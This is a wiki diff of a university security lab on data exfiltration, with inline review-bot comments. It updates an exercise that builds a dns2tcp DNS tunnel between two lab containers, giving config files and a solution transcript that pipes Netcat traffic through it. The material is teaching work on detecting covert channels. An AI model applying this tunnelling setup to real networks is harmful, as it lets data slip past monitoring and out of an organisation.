This shows you the differences between two versions of the page.
cdci:labs:6 [2020/03/17 01:33] mihai.chiroiu [07. [20p] DNS exfiltration] |
cdci:labs:6 [2024/05/10 14:22] (current) mihai.chiroiu [01. [5p] Virtual machine setup] |
Line 1: | Line 1: | ||
====== Lab06. Data exfiltration ====== | ====== Lab06. Data exfiltration ====== | ||
+ | |||
+ | <note warning> | ||
+ | Important read to be graded! | ||
+ | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | ||
+ | </note> | ||
===== Objectives ===== | ===== Objectives ===== | ||
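Review bot: the note text `Important read to be graded!` is missing punctuation and reads as a fragment; suggest `Important: read this to be graded!` so the warning box says what the student has to do before the included `cdci:rec` page is rendered below it.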
Line 22: | Line 27: | ||
git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | ||
git config user.email "student@upb.ro" | git config user.email "student@upb.ro" | ||
+ | </code> | ||
+ | |||
+ | Now we need to build some docker containers | ||
+ | <code> | ||
+ | root@cdci:/# cd cdci/containers/exfiltration_lab06/ | ||
+ | root@cdci:/# make | ||
</code> | </code> | ||
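Review bot: the prompt on the `make` line still shows `root@cdci:/#` after `cd cdci/containers/exfiltration_lab06/`, so the transcript is inconsistent, and the step offers no way to confirm the build succeeded. Suggest showing the prompt with the new working directory and adding a check such as `docker images` after `make` so students can verify the lab06 images exist before continuing. The `cd` also assumes the clone was made in `/`; state that, or give the path relative to wherever `git clone` was run.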
Line 193: | Line 204: | ||
==== 07. [20p] DNS exfiltration ==== | ==== 07. [20p] DNS exfiltration ==== | ||
- | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark. | + | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://www.linuxcertif.com/man/1/dns2tcpc/|dns2tcp]]. Use the following configuration for the client/server side. |
- | + | * Client side configuration | |
- | a. Client side configuration: | + | <code> |
# cat .dns2tcprc | # cat .dns2tcprc | ||
domain = dns2tcp.cdci.ro | domain = dns2tcp.cdci.ro | ||
resource = nc | resource = nc | ||
- | local_port = 9000 | + | local_port = 8080 |
key = secretkey | key = secretkey | ||
- | b. Server side configuration: | + | </code> |
+ | * Server side configuration | ||
+ | <code> | ||
# cat .dns2tcpdrc | # cat .dns2tcpdrc | ||
listen = 0.0.0.0 | listen = 0.0.0.0 | ||
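Review bot: the new lead-in "Use the following configuration for the client/server side" does not explain any of the settings, and `local_port = 8080` is easy to misread as the server's Netcat port when it is the port dns2tcpc opens on the client host. Suggest one sentence per file: `domain` and `key` must be identical on both ends, `resource = nc` must name an entry in the server's `resources` list, and `local_port` is the client-side listener that Netcat connects to. Also worth saying why the port changed from 9000 to 8080, since students with an older checkout will still see 9000.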
Line 210: | Line 223: | ||
domain = dns2tcp.cdci.ro | domain = dns2tcp.cdci.ro | ||
key = secretkey | key = secretkey | ||
- | resources = nc:127.0.0.1:9000 | + | resources = nc:127.0.0.1:8080 |
+ | </code> | ||
+ | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark. | ||
<solution> | <solution> | ||
<code> | <code> | ||
+ | root@h2:/# dns2tcpd -f .dns2tcpdrc | ||
+ | root@h2:/# netstat -nlup | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | udp 0 0 0.0.0.0:53 0.0.0.0:* 428/dns2tcpd | ||
+ | root@h2:/# nc -l -p 8080 -k | ||
+ | TEST | ||
+ | |||
+ | root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 & | ||
+ | [2] 196 | ||
+ | root@h1:/# Listening on port : 8080 | ||
+ | root@h1:/# netstat -nltp | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 196/dns2tcpc | ||
+ | root@h1:/# nc 127.0.0.1 8080 | ||
+ | TEST | ||
+ | ^C | ||
</code> | </code> | ||
</solution> | </solution> |
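Review bot: the solution never shows the capture step that the exercise text added in this hunk asks for ("To view the traffic you can use tcpdump on the IDS"); add an IDS-side line such as `tcpdump -i <interface> -w dns2tcp.pcap udp port 53` and one sentence on what to look for in Wireshark (the long encoded labels under `dns2tcp.cdci.ro` carrying the tunnelled Netcat bytes), otherwise the graded part of the exercise has no reference output. Two smaller points: the `TEST` line under `root@h2:/# nc -l -p 8080 -k` appears before the client is even started, so mark the h2 and h1 blocks as two terminals and note that `TEST` arrives only after `nc 127.0.0.1 8080` sends it; and `-k` is the OpenBSD/ncat keep-open option, so state which netcat the containers ship, since netcat-traditional rejects it.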